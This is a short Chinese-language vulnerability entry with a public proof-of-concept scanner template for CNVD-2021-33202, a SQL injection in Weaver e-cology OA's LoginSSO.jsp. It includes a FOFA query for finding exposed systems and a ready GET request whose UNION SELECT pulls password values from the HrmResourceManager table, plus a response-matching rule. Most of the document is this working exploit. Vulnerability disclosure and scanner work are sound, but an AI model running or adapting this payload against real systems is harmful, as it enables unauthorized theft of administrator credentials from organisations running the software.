漏洞描述
泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息
fofa: app="泛微-协同办公OA"
CNVD-2021-33202: 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞
PoC代码[已公开]
id: CNVD-2021-33202
info:
name: 泛微OA E-Cology LoginSSO.jsp SQL注入漏洞
author: zan8in
severity: high
description: |-
泛微e-cology是专为大中型企业制作的OA办公系统,支持PC端、移动端和微信端同时办公等。 泛微e-cology存在SQL注入漏洞。攻击者可利用该漏洞获取敏感信息
fofa: app="泛微-协同办公OA"
reference:
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-33202
tags: cnvd,cnvd2021,sqli
created: 2021/10/23
rules:
r0:
request:
method: GET
path: /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20password%20as%20id%20from%20HrmResourceManager
expression: response.status == 200 && response.body.bcontains(b'<BODY>\r\n<pre>\r\n<code>')&& response.body.bcontains(b'</code>\r\n</pre>\r\n</BODY>\r\n</HTML>')
expression: r0()